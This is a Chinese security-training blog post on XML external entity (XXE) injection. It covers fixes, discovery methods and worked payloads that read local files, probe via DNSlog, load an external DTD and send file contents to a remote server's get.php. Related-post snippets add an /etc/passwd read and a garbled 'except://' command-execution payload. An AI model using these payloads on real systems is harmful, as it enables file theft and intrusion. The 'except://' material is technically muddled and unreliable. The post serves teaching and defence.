WEB攻防-通用漏洞&XML&XXE&无回显&DTD实体&伪协议&代码审计

已于 2022-10-15 18:13:43 修改
阅读量712 收藏 1
点赞数
文章标签: 前端 xml 安全
于 2022-10-15 16:58:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65336233/article/details/127336981
版权

目录

XML&XXE

XXE修复防御方案

方案1-禁用外部实体

方案2-过滤用户提交的XML数据

思路&发现

思路点

黑盒发现 

白盒发现

案例

1、读取文件

2、带外测试

3、外部实体引用dtd

4、无回显读取文件

XML&XXE

XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

主要危害:可以进行命令读取,读取一些机密或者敏感文件。

XXE修复防御方案

方案1-禁用外部实体

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);

Python:

from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案2-过滤用户提交的XML数据

过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLI

思路&发现

思路点

参考: CTF XXE - MustaphaMond - 博客园

黑盒发现 

1、获取得到Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试

2、不管获取的Content-Type类型或数据传输类型,均可尝试修改后提交测试xxe

3、XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行

白盒发现

1、可通过应用功能追踪代码定位审计--根据功能的特殊代表性定位(比如文件上传,可以直接寻找文件上传功能并进行抓包)

2、可通过脚本特定函数搜索定位审计--如果代码没有特点,可以通过百度搜索php的xml脚本,然后在源码中搜索(比如传输数据,任何地方都存在传输数据的代码)

3、可通过伪协议玩法绕过相关修复等

案例

1、读取文件

思路:客户端负责发送xml的数据,服务端负责解析xml数据。那么如果利用xml写一个带有文件读取的代码发送,就实现了文件读取功能

<?xml version="1.0"?>

<!DOCTYPE Mikasa [<!ENTITY test SYSTEM "file:///d:/e.txt">]>

<user><username>&test;</username><password>Mikasa</password></user>

2、带外测试

思路:在进行文件读取时,无法判断代码是否正确,网页是否有回显和漏洞是否存在。如果网页没有回显就无法判断漏洞是否存在,可以利用dsnlog网页工具,如果dnslog有显示那么就证明代码正确并存在漏洞。

利用网址: http://www.dnslog.cn/

<?xml version="1.0" ?>

<!DOCTYPE test [<!ENTITY % file SYSTEM "http://9v57ll.dnslog.cn"> %file;]>

<user><username>&send;</username><password>Mikasa</password></user>

利用Get SubDomain获取域名,当服务器访问时就会获取ip,证明可以访问并存在漏洞

利用xml语句读取dnslog页面获取的域名,当发现可以获取地址时,证明存在漏洞

 

3、外部实体引用dtd

思路:当一些字符被过滤时,那么可以使用外部实体应用,利用xml语句读取外部dtd文件,而在dtd文件中写入获取文件信息的代码,从而实现读取文件

<?xml version="1.0" ?>

<!DOCTYPE test [<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">%file;]>

<user><username>&send;</username><password>Mikasa</password></user>

 

evil2.dtd文件内容:

<!ENTITY send SYSTEM "file:///d:/e.txt">

利用burp让页面通过xml的确外部dtd文件,并在dtd文件中写入读取文件的代码

 获取数据

4、无回显读取文件

思路:利用xml代码,让页面读取文件并进行赋值给变量同时访问dtd文件,在dtd文件中将获取内容的变量赋值到新的变量中并传递到本地服务器,在本地服务器利用php代码接受即可。

<?xml version="1.0"?>

<!DOCTYPE ANY[<!ENTITY % file SYSTEM "file:///d:/e.txt">

<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">

%remote;

%all;

]>

<root>&send;</root>

test.dtd文件内容

<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">

同时读取文件并访问dtd文件,在dtd中负责接收并传递给服务器,get文件为接收文件,test文件为读取信息的写入文件。 

 

@墨竹
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
(2)外部文档声明 (1)内部实体声明 (2)外部实体声明 (3)参数实体声明
小迪安全41WEB 攻防-通用漏洞&XML&XXE&无回显&DTD 实体&伪协议&代码审计
最新发布
weixin_73760178的博客
03-17 1074
因此,可以从到无回显的网页中,排去无回显的其他原因(代码写错、网络问题、没有漏洞等情况),当工具网页中,出现了来自内部的iP,则说明XXE漏洞存在,只是不回显数据。将读取到的文件信息,保存到指定地址中,并让本地接收的文件写入get.php,对读取的文件信息进行收集保存到本地file.txt。输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。那就远程读取文件,将文件进行保存,再用get.php进行读取,存入file.txt文件,获取相关内容。
41、WEB攻防——通用漏洞&XML&XXE&无回显&DTD实体&伪协议&代码审计
qq_55202378的博客
01-31 1298
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成。没有回显,可能原因:1、代码写错了;,带外测试也不会有回显,但是DNSlog上会有记录。例如,注释掉输出语句,前端将不会显示读取的内容。发送xml实体引用,目标文件的内容将会保存到。、内网端口扫描、攻击内网网站等危害。
【Java代码审计XXE
qq_48201589的博客
03-02 625
XXEXML External Entity),即XML外部实体注入漏洞XXE漏洞发生于应用程序在解析XML时,没有对恶意内容进行过滤,导致可造成文件读取,命令执行,攻击内网网站,内网端口扫描,进行DOS攻击等危害。 XML(Extensible Markup Language):可扩展标记语言,用来存储及传输信息。
XXE回显攻击详解
永远是少年
12-23 1369
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE回显攻击详解。 一、XXE回显攻击简介 二、XXE回显攻击实战
XXE原理,利用与修复详解
GalaxySpaceX的博客
07-20 1012
XXE原理+利用+修复
XXE漏洞-黑白盒测试+无回显
xiaoheizi的博客
07-02 751
XML被设计是为了传输和存储数据,XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。test.dtd内容:
浅析无回显XXE(Blind XXE
蚁景网安学院
05-11 1254
XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。 外部实体对于在文档中创建动态引用非常有用,这样对引用资源所做的任何更改都会在文档中自动更新。 但是,在处理外部实体时,可以针对应用程序启动许多攻击。
WEB安全XXE实体注入漏洞.pdf
12-12
WEB安全XXE实体注入漏洞
SP2019-LAB1.3&1.4&1.5-3170103456-应承峻1
08-03
4.1 SQL Injection 4.2 SQL Injection (advanced) 4.4 XXE (External Entity Injectio
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
第85天:CTF夺旗-JAVA考点反编译&XXE&反序列化1
08-03
CTF 夺旗-JAVA 考点反编译&XXE&反序列化#Java 常考点及出题思路考点技术:xxe,spel 表达式,反序列化,文件安全,最新框架插件漏洞等设法间
XXE漏洞详解
weixin_53440207的博客
03-08 612
xxe漏洞详解
渗透无回显,放弃 or 看这篇文章
大河之犬的博客
05-15 734
通俗的说就是我有个已注册的域名a.com,我在域名代理商那里将域名设置对应的ip 1.1.1.1 上,这样当我向dns服务器发起a.com的解析请求时,DNSlog中会记录下他给a.com解析,解析值为1.1.1.1,而我们这个解析的记录的值就是我们要利用的地方。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.baidu.com等的访问信息,类似日志文件。打开新网页并粘贴在url上,访问这个三级域名。ceye使用方法类似。
DNSLog漏洞探测(五)之XXE漏洞实战
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-12 420
现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,这下我们就通过DNSLog平台验证了该处存在XXE漏洞。首先我们先进入Pikachu靶场的XXE漏洞界面。首先,我们先打开DNSLog服务平台,点击 Get SubDomain 获取一个子域名,这里我们获取到的子域名是 adswfw.dnslog.cn。接下来我们只需要提交以下的payload,将其中的XXXXX部分替换为我们从DNSLog服务平台获取到的子域名就好了。
利用 DNSLog无回显注入
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-18 549
基本上,DNSLog服务提供了一个自定义的DNS服务器,将请求保存在日志中,并为每个请求生成一个唯一的域名。无回显注入是指在注入点无法直接获取响应的情况下,通过DNSLog获取注入结果的一种注入方式。无回显注入的原理是将注入结果作为DNS请求的一部分,通过DNSLog获取DNS请求的响应,从而获取注入结果。构造注入payload:根据目标应用程序的注入点,构造用于触发DNS请求的注入payload。通常,注入点位于应用程序的输入字段中。触发注入:向应用程序提交经过注入负载处理的请求,以触发注入攻击。
XXE漏洞复现(有无回显
cainiao17441898的博客
07-01 1681
环境:这里可以在metasploitable中进行试验,不可以在centos中进行试验,因为默认情况下centos中已经修复相关漏洞。libxml2.9.0之后默认不执行外部实体。用命令:rpm -qa | grep libxml可以去查看libxml的版本。 复现: 先去生成一个解析xml数据并打印传入的数据的一个php文件。 <?php $xml=file_get_contents("php://input"); $data = simplexml_load_string($xml) ; e
(39.2)【XXE漏洞专题】XXE原理、产生、检测、危害、利用、示例
04-26 3449
【专题】XXE入门
在pikachu靶场平台利用XXE漏洞调用except伪协议调用系统命令,执行系统命令
05-23
首先需要了解什么是XXE漏洞,它是指攻击者可以通过向Web应用程序发送恶意XML文件来触发应用程序内部的XML解析器,并导致攻击者能够读取任意文件、执行任意命令等攻击。 接下来,我们需要利用XXE漏洞调用except伪协议来执行系统命令。except伪协议是一种在XML文档中嵌入任意数据的方法,它的语法如下: ``` <!ENTITY name SYSTEM "file:///path/to/file"> ``` 其中name为实体名称,可以在XML文档中通过&name;来引用,file:///path/to/file为要读取的文件路径。 我们可以利用这个语法来执行系统命令,具体步骤如下: 1. 构造包含XXE漏洞XML文件,例如: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo> ``` 这个XML文件包含一个名为xxe实体,它的值为file:///etc/passwd,表示要读取/etc/passwd文件。 2. 将XML文件发送到目标应用程序,并触发XXE漏洞。如果漏洞存在,则应用程序会解析XML文件,并读取xxe实体的值。 3. 修改实体的值,将它改为要执行的系统命令。例如: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "except://`ls /`"> ]> <foo>&xxe;</foo> ``` 这个XML文件将xxe实体的值改为了except://`ls /`,表示要执行ls /命令。 4. 再次发送XML文件到目标应用程序,触发XXE漏洞,并执行系统命令。 需要注意的是,如果目标系统禁止了except伪协议,则无法利用这种方法执行系统命令。此外,执行系统命令可能会产生安全风险,建议仅在测试环境中使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值